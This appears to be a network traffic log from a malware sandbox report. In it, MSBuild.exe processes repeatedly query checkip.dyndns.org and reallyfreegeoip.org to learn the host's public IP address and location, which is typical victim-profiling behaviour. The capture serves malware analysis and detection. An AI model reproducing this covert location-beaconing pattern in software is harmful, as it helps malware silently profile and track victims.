Nov 6, 2024 17:02:57.564851046 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f89639524acf1d027d2925d18fb18706 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	56919	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:58.370336056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:59.215281963 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:59 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bc76cb85d5f61dc84cd8a5309c614270 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	56927	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:03:00.053035021 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:03:00.894479990 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:03:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: de5e66bd0526c046a18a12ec20106a7c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	56827	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:44 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:45 UTC	1215	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:45 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38156 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VeNn0mvBlZINM2ffsWWve2308gznsL2gCk3j50fa996lZNA38sGyhWcUuK6bb2W8nDiP%2B1yLB5qm3Vo0RU02WR8AxrYwRbXxyUWrNWVBfbK4nDheGF0RdIy63ALmgydh33iDYU%2BW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f47df0b144a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1268&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2169288&cwnd=219&unsent_bytes=0&cid=50afbfb305127c66&ts=243&x=0"
2024-11-06 16:02:45 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-06 16:02:45 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	56834	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:46 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:02:46 UTC	1211	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:46 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868 x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront) x-amz-cf-pop: DEN52-C1 x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4504 Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8rqNktuiSqql3wr67LexbUi2wy7fiEIZUOG2IuLqgTPuWb1VpeSvDzrKknfuZkCH0g7Yirf7uwBFBGAutSrp5nxSXkB7rBPNRq67u0421WzZU2uBB%2B5kBxsyY3xajbUhAv6kvl2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f4f0c7a79a4-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18889&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153008&cwnd=32&unsent_bytes=0&cid=fe16216eafd64245&ts=211&x=0"
2024-11-06 16:02:46 UTC	158	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
2024-11-06 16:02:46 UTC	201	IN	Data Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	56849	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:47 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:47 UTC	1213	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:47 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38158 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsOdSEQVQjWhDSS66EVixRL4VkgY3W16N2g5Jst5ieznkgQkWLJMo0HJdg13fucE0AJ0sh9O5xfBAe4ge468MRkISiv5CRFanyX%2FfRnhzDOoZ9XhQQUAXAGrrMIF0PGyboJWeyr5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f592a5c477b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=701&delivery_rate=1421698&cwnd=251&unsent_bytes=0&cid=fb4ded9134c4b993&ts=163&x=0"
2024-11-06 16:02:47 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-06 16:02:47 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	56858	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:49 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:02:49 UTC	1221	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:49 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38160 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NkIsQdLTo21YgOdL3eh2QXr4qnITGeuVsUSjY3Gl0L2XmB45JYRWXJ%2FGcAd5VHru7A3vvplDbcVDVAEe%2BD4hkCBpx4T%2B%2BuPavIo1v%2FyZnViYQ6fPBvszEF3UHhJfTl5DJdc3jc6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f635e68e716-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2456&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1196694&cwnd=251&unsent_bytes=0&cid=13b3ee98a4161196&ts=174&x=0"
2024-11-06 16:02:49 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-06 16:02:49 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	56857	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:49 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:49 UTC	1221	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:49 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38160 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73o%2FuNHuoAIibD11hUF6vjmQQ%2FAO0ca9uMVnaUGLcI8QSGL0HkinEZrns1NazMBPziYQmZn0v1tJgwf%2BkDZvkB4%2F7nU4DT24m1BmB3lpHhxctuWh%2FN25oa1TDB5IH0DxemAv43iW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f64ecda47fd-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1874&sent=7&recv=7&lost=0&retrans=2&sent_bytes=5700&recv_bytes=701&delivery_rate=707376&cwnd=211&unsent_bytes=0&cid=4adeedf844a805bc&ts=1075&x=0"
2024-11-06 16:02:49 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-06 16:02:49 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	56868	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:50 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:02:51 UTC	1211	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:51 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38162 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqfKrt7mLxEM1bU1HH5DX0bcYol0bMAPEVVXjGz3GyMLu1G6pBrZg8wGu69Es4qZIsmUkIsTfUIFqrQxNtNxk1gCdt7Xc2J9hmxOrDg531tDEPJI2tD0bsMK7zzsBxM3OPY2NmTZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f6ccd646b0b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1688629&cwnd=251&unsent_bytes=0&cid=8d096df79227781d&ts=179&x=0"
2024-11-06 16:02:51 UTC	158	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
2024-11-06 16:02:51 UTC	201	IN	Data Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	56869	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:51 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
